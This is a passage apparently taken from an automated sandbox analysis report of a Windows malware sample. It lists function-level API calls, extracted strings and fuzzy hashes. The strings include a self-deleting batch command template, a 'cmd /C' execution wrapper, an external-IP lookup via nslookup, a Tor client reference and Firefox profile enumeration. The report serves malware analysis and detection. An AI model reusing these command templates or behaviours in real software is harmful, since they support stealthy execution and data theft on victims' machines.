HeapFree.KERNEL32(00000000,00000000), ref: 02B92118
RtlImageNtHeader.NTDLL(00000000), ref: 02B92143
HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 02B92200

Part of subcall function 02B832D8: lstrlen.KERNEL32(?,00000000,76D26980,?,02B8AEA4,?), ref: 02B832E1
Part of subcall function 02B832D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 02B83304
Part of subcall function 02B832D8: memset.NTDLL ref: 02B83313

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 02B921AF
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 02B921E0

Strings

TorClient, xrefs: 02B9217E, 02B921CB

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: TorClient
API String ID: 239510280-3399603969
Opcode ID: 98effc0f97e691338edfe2b1ef5fd12e9e3b3f172e9d8832fbc3e208b687ae93
Instruction ID: c551f837789ec197e1d162a21f5dcabd23564b09b6fa522951739e51976d2972
Opcode Fuzzy Hash: 98effc0f97e691338edfe2b1ef5fd12e9e3b3f172e9d8832fbc3e208b687ae93
Instruction Fuzzy Hash: CD41F631E80215FBEF226B54CD45FAE7BA9EB45784F1000B5FE05EB190DBB08AA0DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B8091D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,76D25520,02B76990,76D25520,00000001,@ID@,02B8F47B,?), ref: 02B80934
lstrlen.KERNEL32(?), ref: 02B80944
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B80978
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 02B809A3
memcpy.NTDLL(00000000,?,?), ref: 02B809C2
HeapFree.KERNEL32(00000000,00000000), ref: 02B80A23
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 02B80A45

Strings

W, xrefs: 02B80A71

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: 3b08cdaea950ec2391ede6344671ac7f79170f06c3aa808f1fbbcc7f86d03ef0
Instruction ID: 62a054436c331eed14a10b7d530495ca91410d9606bb395884a420855f50a049
Opcode Fuzzy Hash: 3b08cdaea950ec2391ede6344671ac7f79170f06c3aa808f1fbbcc7f86d03ef0
Instruction Fuzzy Hash: DE41FB7190020AEFDF11EF95CC84AAE7BB9FF04384F1589A5E918A7211E7319A58DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B7A123, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 02B7A144

Part of subcall function 02B81B2B: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,02B7A164,?), ref: 02B81B50
Part of subcall function 02B81B2B: RtlAllocateHeap.NTDLL(00000000,?), ref: 02B81B62
Part of subcall function 02B81B2B: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,02B7A164,?), ref: 02B81B7F
Part of subcall function 02B81B2B: lstrlenW.KERNEL32(00000000,?,?,02B7A164,?), ref: 02B81B8B
Part of subcall function 02B81B2B: HeapFree.KERNEL32(00000000,00000000,?,?,02B7A164,?), ref: 02B81B9F

RtlEnterCriticalSection.NTDLL(00000000), ref: 02B7A17C
CloseHandle.KERNEL32(?), ref: 02B7A18A
HeapFree.KERNEL32(00000000,?,?,00000001,.dll,?,00001000,?,?,?), ref: 02B7A242
RtlLeaveCriticalSection.NTDLL(00000000), ref: 02B7A251
HeapFree.KERNEL32(00000000,00000000,.dll,?,00001000,?,?,?), ref: 02B7A264

Strings

.exe, xrefs: 02B7A1A0, 02B7A1B2, 02B7A1E8
.dll, xrefs: 02B7A199

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: d3e45518a252611e510a4ea73c277d317ad2c77c489d5dcc45361dae11ca160f
Instruction ID: f5d6bbf9c3fd494ba0fa188225fa5cebc27b2c9322742052c50ed06d51370cee
Opcode Fuzzy Hash: d3e45518a252611e510a4ea73c277d317ad2c77c489d5dcc45361dae11ca160f
Instruction Fuzzy Hash: 4D41F332A00206EBDF21EF95D980FAE7BB9FF50B44F2004A9F955A7150DB71DA50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B91A07, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(02B9DF6C), ref: 02B91A19
lstrcpy.KERNEL32(00000000), ref: 02B91A4E

Part of subcall function 02B9134B: lstrlen.KERNEL32(?,00000008,00000000,?,76D25520,02B81372,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?,00000001), ref: 02B9135A
Part of subcall function 02B9134B: mbstowcs.NTDLL ref: 02B91376

GetLastError.KERNEL32(00000000), ref: 02B91ADF
HeapFree.KERNEL32(00000000,?), ref: 02B91AF6
InterlockedDecrement.KERNEL32(02B9DF6C), ref: 02B91B0D
DeleteFileA.KERNEL32(00000000), ref: 02B91B2E
HeapFree.KERNEL32(00000000,00000000), ref: 02B91B3E

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

Strings

.avi, xrefs: 02B91A41

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: 9c4e67e87584ccca5fb0fa4a9c040da350a40dd4f6cab4b68d9ae117568ab719
Instruction ID: f1544c14433a57f744148ec52291053ed43400081463998be53458132aa580f7
Opcode Fuzzy Hash: 9c4e67e87584ccca5fb0fa4a9c040da350a40dd4f6cab4b68d9ae117568ab719
Instruction Fuzzy Hash: 6B310532E40119FBDF11AFA9DD44BAD7BBAEB49781F1084A1F918E7150D7708E50EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7DA1D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 02B7DA41

Part of subcall function 02B878E3: lstrlen.KERNEL32(00000000,76D7F730,-00000001,00000000,?,?,?,02B7DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B878F4
Part of subcall function 02B878E3: lstrlen.KERNEL32(?,?,?,?,02B7DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B878FB
Part of subcall function 02B878E3: RtlAllocateHeap.NTDLL(00000000,?), ref: 02B8790D
Part of subcall function 02B878E3: _snprintf.NTDLL ref: 02B87930
Part of subcall function 02B878E3: _snprintf.NTDLL ref: 02B87959
Part of subcall function 02B878E3: HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 02B8797A

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B7DACD
HeapFree.KERNEL32(00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B7DAEA
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B7DAF2
HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B7DB01

Strings

ss: *.*.*.*, xrefs: 02B7DA83, 02B7DA88, 02B7DAAB
s:, xrefs: 02B7DAC3
nslookup myip.opendns.com resolver1.opendns.com , xrefs: 02B7DA4E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: e2b81ca2c16892e65c53dd129308c3cae011aa5c79fffdfd177d294869e6948f
Instruction ID: 51cd4fcce7ee7d073ede4d3725307c90c7c6061368c344e33cc60041b19be171
Opcode Fuzzy Hash: e2b81ca2c16892e65c53dd129308c3cae011aa5c79fffdfd177d294869e6948f
Instruction Fuzzy Hash: AD212172E4420ABBDB11AAE9CD85FAF7BBCEF05354F0409A4E615E2141EB709600CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B7EF65, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,?,?), ref: 02B7EF89

Part of subcall function 02B8C747: lstrcpy.KERNEL32(-000000FC,00000000), ref: 02B8C781
Part of subcall function 02B8C747: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,02B7EF96,?,?,?), ref: 02B8C793
Part of subcall function 02B8C747: GetTickCount.KERNEL32 ref: 02B8C79E
Part of subcall function 02B8C747: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,02B7EF96,?,?,?), ref: 02B8C7AA
Part of subcall function 02B8C747: lstrcpy.KERNEL32(00000000), ref: 02B8C7C4

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

lstrcpy.KERNEL32(00000000), ref: 02B7EFB9
wsprintfA.USER32 ref: 02B7EFCC
GetTickCount.KERNEL32 ref: 02B7EFE1
wsprintfA.USER32 ref: 02B7EFEF

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Strings

attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 02B7EFE9
.bat, xrefs: 02B7EFAC
"%S", xrefs: 02B7EFC6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: 4539f82560f5ba10695ae194886e49903874dc85274eb458d52f9284b5b9602a
Instruction ID: a85b5e1e7557d288475fd53cb3790742d7efcc12493d083981f23fadc8364bc2
Opcode Fuzzy Hash: 4539f82560f5ba10695ae194886e49903874dc85274eb458d52f9284b5b9602a
Instruction Fuzzy Hash: 2211E3729013127BD2103F74AC48E6F7B9CDF96794F044899FE59A3301DBB498108AB5

Uniqueness

Uniqueness Score: -1.00%

Function 02B878E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,76D7F730,-00000001,00000000,?,?,?,02B7DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B878F4
lstrlen.KERNEL32(?,?,?,?,02B7DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 02B878FB
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B8790D
_snprintf.NTDLL ref: 02B87930

Part of subcall function 02B7B598: memset.NTDLL ref: 02B7B5AD
Part of subcall function 02B7B598: lstrlenW.KERNEL32(00000000,00000000,00000000,7730DBB0,00000000,cmd /C "%s> %s1"), ref: 02B7B5E6
Part of subcall function 02B7B598: wcstombs.NTDLL ref: 02B7B5F0
Part of subcall function 02B7B598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7730DBB0,00000000,cmd /C "%s> %s1"), ref: 02B7B621
Part of subcall function 02B7B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,02B8793E), ref: 02B7B64D
Part of subcall function 02B7B598: TerminateProcess.KERNEL32(?,000003E5), ref: 02B7B663
Part of subcall function 02B7B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,02B8793E), ref: 02B7B677
Part of subcall function 02B7B598: CloseHandle.KERNEL32(?), ref: 02B7B6AA
Part of subcall function 02B7B598: CloseHandle.KERNEL32(?), ref: 02B7B6AF

_snprintf.NTDLL ref: 02B87959

Part of subcall function 02B7B598: GetLastError.KERNEL32 ref: 02B7B67B
Part of subcall function 02B7B598: GetExitCodeProcess.KERNEL32(?,00000001), ref: 02B7B69B

HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 02B8797A

Strings

cmd /C "%s> %s1", xrefs: 02B8791F, 02B87927, 02B87952
echo -------- >, xrefs: 02B8794D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: 2ed1bc5eaaef1976b5255a25cd2fa97563e56e95e169c740f623df0ca354e678
Instruction ID: 2e20f4a3a60bffa22554b15b03f0cb185ab38905116de50e428c392f8c89f940
Opcode Fuzzy Hash: 2ed1bc5eaaef1976b5255a25cd2fa97563e56e95e169c740f623df0ca354e678
Instruction Fuzzy Hash: D3118F76900118FBCF126F54DC05E9EBF3AEF497A8F214691F908A7260C7719A60EB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B914AB, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,76D25520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 02B914C2
lstrlen.KERNEL32(?), ref: 02B914CA
lstrlen.KERNEL32(?), ref: 02B91535
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B91560
memcpy.NTDLL(00000000,00000002,?), ref: 02B91571
memcpy.NTDLL(00000000,?,?), ref: 02B91587
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 02B91599
memcpy.NTDLL(00000000,02B983E4,00000002,00000000,?,?,00000000,?,?), ref: 02B915AC
memcpy.NTDLL(00000000,?,00000002), ref: 02B915C1

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 79ba5ca571693aa74ff5a68bfc3db80e7febc708f36a35391d198ee1e059898c
Instruction ID: 113685d5546ed2c86f95beff774a30e6d2011cfc638ff52c6978a7f59c315086
Opcode Fuzzy Hash: 79ba5ca571693aa74ff5a68bfc3db80e7febc708f36a35391d198ee1e059898c
Instruction Fuzzy Hash: 21413D76D0021AEBCF01DFA8CC80A9EBBB9EF48354F1544A6E919A3211E731DA55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B8E710, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8B8FB: RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B8B903
Part of subcall function 02B8B8FB: RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B8B918
Part of subcall function 02B8B8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 02B8B931

RtlAllocateHeap.NTDLL(00000000,02B926D1,00000000), ref: 02B8E761
lstrlen.KERNEL32(00000008,?,?,?,02B926D1,00000000), ref: 02B8E770
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 02B8E782
HeapFree.KERNEL32(00000000,00000000,?,?,?,02B926D1,00000000), ref: 02B8E792
memcpy.NTDLL(00000000,00000000,02B926D1,?,?,?,02B926D1,00000000), ref: 02B8E7A4
lstrcpy.KERNEL32(00000020,00000008), ref: 02B8E7D6
RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B8E7E2
RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B8E83A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 0192e5f29114fa5bb4528ea626a73216789d681cd05e1b47bf037488f20b4e1a
Instruction ID: 5fe2c44b0758be58a1c5776306a5b1d1ac40d45cc48896664c2a6629828093e7
Opcode Fuzzy Hash: 0192e5f29114fa5bb4528ea626a73216789d681cd05e1b47bf037488f20b4e1a
Instruction Fuzzy Hash: 24418875900705EFDB21AF68D984B5ABBF5FF08748F108A9AF95997240D730E960CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B84241, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,02B81ED8), ref: 02B84282
GetLastError.KERNEL32 ref: 02B8428C
WaitForSingleObject.KERNEL32(000000C8), ref: 02B842B1
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 02B842D2
SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 02B842FA
WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 02B8430F
SetEndOfFile.KERNEL32(00000006), ref: 02B8431C
GetLastError.KERNEL32 ref: 02B84328
CloseHandle.KERNEL32(00000006), ref: 02B84334

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 4a899aa71578a926054c785a8a13e186bb37be6700393c35e1a5240f5ec1f892
Instruction ID: be1f83ce9cfda69b84cb3ebe4b375bfeb852d2c0182822689a2d6b5b2257b9df
Opcode Fuzzy Hash: 4a899aa71578a926054c785a8a13e186bb37be6700393c35e1a5240f5ec1f892
Instruction Fuzzy Hash: B031AF70840209FFEF109FA4DE09BAE7BB9EB05355F1086A5F954E60D0D3748AA4CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02B82EE9, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,02B7EF3A,00000008,02B879A9,00000010,00000001,00000000,0000012B,02B879A9,00000000), ref: 02B82F08
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 02B82F3C
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 02B82F44
GetLastError.KERNEL32 ref: 02B82F4E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 02B82F6A
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 02B82F83
CancelIo.KERNEL32(?), ref: 02B82F98
CloseHandle.KERNEL32(?), ref: 02B82FA8
GetLastError.KERNEL32 ref: 02B82FB0

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 73843568f972fd2fa6804099aac5c41a53952e2b5b7cd449677cfafcfdcb770a
Instruction ID: 9b70381bde25ae47215c835b0534d2e498bfb59f2ffdcec59198627af9281ecb
Opcode Fuzzy Hash: 73843568f972fd2fa6804099aac5c41a53952e2b5b7cd449677cfafcfdcb770a
Instruction Fuzzy Hash: FF217F72940118BFDB01AFA8D9499DE7B79FB49390B008862F90AD3150D7708650CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B0AA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9134B: lstrlen.KERNEL32(?,00000008,00000000,?,76D25520,02B81372,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?,00000001), ref: 02B9135A
Part of subcall function 02B9134B: mbstowcs.NTDLL ref: 02B91376

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B77010), ref: 02B8B0FD

Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 02B888D9
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,?,00000000), ref: 02B888E5
Part of subcall function 02B8888D: memset.NTDLL ref: 02B8892D
Part of subcall function 02B8888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88948
Part of subcall function 02B8888D: lstrlenW.KERNEL32(0000002C), ref: 02B88980
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?), ref: 02B88988
Part of subcall function 02B8888D: memset.NTDLL ref: 02B889AB
Part of subcall function 02B8888D: wcscpy.NTDLL ref: 02B889BD

PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 02B8B117
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,02B77010), ref: 02B8B141

Part of subcall function 02B8888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 02B889E3
Part of subcall function 02B8888D: RtlEnterCriticalSection.NTDLL(?), ref: 02B88A18
Part of subcall function 02B8888D: RtlLeaveCriticalSection.NTDLL(?), ref: 02B88A34
Part of subcall function 02B8888D: FindNextFileW.KERNEL32(?,00000000), ref: 02B88A4D
Part of subcall function 02B8888D: WaitForSingleObject.KERNEL32(00000000), ref: 02B88A5F
Part of subcall function 02B8888D: FindClose.KERNEL32(?), ref: 02B88A74
Part of subcall function 02B8888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88A88
Part of subcall function 02B8888D: lstrlenW.KERNEL32(0000002C), ref: 02B88AAA

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 02B8B15E
WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 02B8B17F
PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,02B77010), ref: 02B8B194

Strings

*.*, xrefs: 02B8B107

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID: *.*
API String ID: 2670873185-438819550
Opcode ID: f426ca49bd4083211a5e8383a58e6db7d51d4fa4bcd15a353791171ef6cc8422
Instruction ID: fcd9bbf143c0b571edabaff7c89a49563b10fdc3938e6351a23894bf81c0d341
Opcode Fuzzy Hash: f426ca49bd4083211a5e8383a58e6db7d51d4fa4bcd15a353791171ef6cc8422
Instruction Fuzzy Hash: D0314972414206AFCB10BF75D88482EBBFAFF89298F04096DF588E3161E731D955CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B7AC31, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 02B7AC4F
RegQueryValueExA.ADVAPI32(?,Main,00000000,76D7F710,00000000,?,76D7F710,00000000), ref: 02B7AC74
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B7AC85
RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 02B7ACA0
HeapFree.KERNEL32(00000000,?), ref: 02B7ACBE
RegCloseKey.ADVAPI32(?), ref: 02B7ACC7

Strings

Main, xrefs: 02B7AC6B, 02B7AC70, 02B7AC9C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: 7f004d250ab466f02500287de3c73a18b95cf9ccd71893f2221b30788bfb2314
Instruction ID: 01cef495ebc2663b859a051e2b87ff4c5a35dde67c6cae29f2f2e1b1c9732fd3
Opcode Fuzzy Hash: 7f004d250ab466f02500287de3c73a18b95cf9ccd71893f2221b30788bfb2314
Instruction Fuzzy Hash: D311D476D00109FFDF01AFE5DE84DAEBBBDFB48344B1048AAE511A2150D7319E25DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8798A, Relevance: 12.1, APIs: 8, Instructions: 121memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7810A: RegCreateKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7811F
Part of subcall function 02B7810A: lstrlen.KERNEL32(05AE8900,00000000,00000000,?,?,02B879A9,00000000,?), ref: 02B7814D

RtlAllocateHeap.NTDLL(00000000,00000105), ref: 02B879CF
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 02B879E7
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B87A5D
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AAD
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AD6
HeapFree.KERNEL32(00000000,02B71489,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AE6
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AEF

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 8b2198d28ad71a00bb64bfc2df3d5f08b4b5a646f813d5770f24904516ecac25
Instruction ID: 1f40617e9973ae129062c2645e243d98a97fa24cc8bfcf231175a0b4a6f6359f
Opcode Fuzzy Hash: 8b2198d28ad71a00bb64bfc2df3d5f08b4b5a646f813d5770f24904516ecac25
Instruction Fuzzy Hash: 3D41C875C0010AFFDF11AFD5DD849AEBB79FB08348F2044AAE519A2160D7314A65EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8A1FF, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02B9470F), ref: 02B8A215
wsprintfA.USER32 ref: 02B8A23D
lstrlen.KERNEL32(?), ref: 02B8A24C

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

wsprintfA.USER32 ref: 02B8A28C
wsprintfA.USER32 ref: 02B8A2C1
memcpy.NTDLL(00000000,?,?), ref: 02B8A2CE
memcpy.NTDLL(00000008,02B983E4,00000002,00000000,?,?), ref: 02B8A2E3
wsprintfA.USER32 ref: 02B8A306

Memory Dump Source

